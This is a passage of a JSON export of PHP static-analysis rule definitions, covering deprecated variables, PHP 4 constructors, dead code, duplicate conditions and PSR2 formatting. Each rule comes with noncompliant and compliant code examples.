<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar';      \/\/Noncompliant\n$$$var = 'hello';  \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Replace<\/th>\n      <th>With<\/th>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SERVER_VARS<\/td>\n      <td>$_SERVER<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_GET_VARS<\/td>\n      <td>$_GET<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_VARS<\/td>\n      <td>$_POST<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_FILES<\/td>\n      <td>$_FILES<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SESSION_VARS<\/td>\n      <td>$_SESSION<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_ENV_VARS<\/td>\n      <td>$_ENV<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_COOKIE_VARS<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. 
<\/p>\n<p>This rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n  function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP 5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__construct<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::Bar();\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::__construct();\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. 
Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n    $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n    $this-&gt;name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code>&lt;?php\n?&gt;<\/code> tags or the short-echo <code>&lt;?= ?&gt;<\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?\n$foo = 1;\n?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n$foo = 1;\n?&gt;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. 
However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n  $i++;             \/\/ this is never executed\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    goto error;\n  } else {\n    \/\/ do the job\n  }\n  return;\n\n  error:\n    printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    handleError();\n  } else {\n    \/\/ do the job\n  }\n  return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n  doZ();\n}\nif ( $a != $a ) { \/\/ always false\n  doY();\n}\nif ( $a == $b &amp;&amp; $a == $b ) { \/\/ if the first one is true, the second one is too\n  doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n  doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 &lt;&lt; 1; \/\/ Compliant\n$j = $a &lt;&lt; $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. 
Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n  <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n  In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar1 = 1;\n   private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. 
Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The closing <code>?&gt;<\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n  <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n  be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n  the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php ECHO 'Hello World'; ?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php echo 'Hello World'; ?&gt;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. 
To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...}  \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\");  \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\"){...}\n\nmakeyogurt(\"raspberry\"); \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} else if ($expr2) {\n  ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} elseif ($expr2) 
{\n  ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            exit(23);\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            throw new Exception('Value 42 is not expected.');\n        }\n    }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. 
The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002   {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if($thirdThing) {      \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    }\n    else {                 \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n      ...\n    }\n\n    try{                   \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the 
curly brace\n      ...\n    } catch (Exception $e) {\n\u2002\u2002  }\n\n    analyse( $fruit ) ;    \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n    for ($i = 0;$i &lt; 10;   $i++) { \/\/ Noncompliant; there should be exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    pressJuice($apply ,$orange);    \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n    do_something ();       \/\/ Noncompliant; there should not be any space after the method name\n\n    foreach ($fruits    as $fruit_key =&gt;     $fruit) {  \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\nclass ClassB\nextends ParentClass  \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n  ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n    \\Serializable    \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n  public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n    &amp;$arg2, array $arg3 = []) {\n\n    $noArgs_longVars = function () use ($longVar1,         \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n        $longerVar2,\n        $muchLongerVar3\n    ) {\n      ...\n    };\n\n    $foo-&gt;bar($longArgument,    \/\/ Noncompliant; the arguments in a method call should be correctly indented\n      $longerArgument,\n      $muchLongerArgument);     \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n    $closureWithArgsAndVars = function($arg1, $arg2)use   ($var1, $var2) {  \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n      ...\n    };\n  
}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass;             \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n                          \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002           \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n  {\u2002\u2002\u2002\u2002                   \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if ($thirdThing) {    \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    } else {              \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n      ...\n    }\n\n    try {                 \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n      ...\n    } catch (Exception $e) {\n      ...\n    }\n\n    analyse($fruit);      \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n    for ($i = 0; $i &lt; 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    
pressJuice($apply, $orange);   \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n    do_something();       \/\/ Compliant; there is no space after the method name\n\n    foreach ($fruits as $fruit_key =&gt; $fruit) {  \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n  ...\n}\n\nclass ClassB2 extends             \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n  ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n    \\ArrayAccess,         \/\/ Compliant; the list of implemented interfaces is correctly indented\n    \\Countable,\n    \\Serializable\n{\n  \/* Argument lists may be split across multiple lines, where each subsequent line\n   * is indented once. When doing so, the first item in the list should be on the next line,\n   * and there should be only one argument per line. 
Also, when the argument list is\n   * split across multiple lines, the closing parenthesis and opening brace should be\n   * placed together on their own line with one space between them.\n   *\/\n  public function aVeryLongMethodName(\n    ClassTypeHint $arg1,  \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n      &amp;$arg2,\n      array $arg3 = []\n    ) {\n      $noArgs_longVars = function () use (\n        $longVar1,        \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n        $longerVar2,\n        $muchLongerVar3\n      ) {\n        ...\n      };\n\n\n    \/* Argument lists may be split across multiple lines, where each subsequent line is\n     * indented once. When doing so, the first item in the list should be on the next line,\n     * and there should be only one argument per line.\n     *\/\n    $foo-&gt;bar(\n      $longArgument,       \/\/ Compliant; the arguments in the method call are correctly indented\n      $longerArgument,\n      $muchLongerArgument\n    );                     \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n    \/* Closures should be declared with a space after the \"function\" keyword,\n     * and a space before and after the \"use\" keyword.\n     *\/\n    $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n      ...\n    };\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, &quot;extends&quot; and &quot;implements&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closure declarations should be correctly 
spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":"&quot;namespace&quot; declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after &quot;as&quot; keyword and &quot;=&gt;&quot; operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next &quot;else&quot;, &quot;catch&quot; and &quot;finally&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":"&quot;use&quot; declarations should be followed 
by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each &quot;;&quot; in &quot;for&quot; statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":"&quot;use&quot; declarations should be placed after &quot;namespace&quot; declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x &lt; 0) {\n  new foo;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x &lt; 0) {\n  $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. 
At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 1)  \/\/ Noncompliant\n  moveWindowToTheBackground();\n\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  case 1:  \/\/ Noncompliant\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 3)\n  moveWindowToTheBackground();\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches 
in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover, when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\n$b = $a ? 
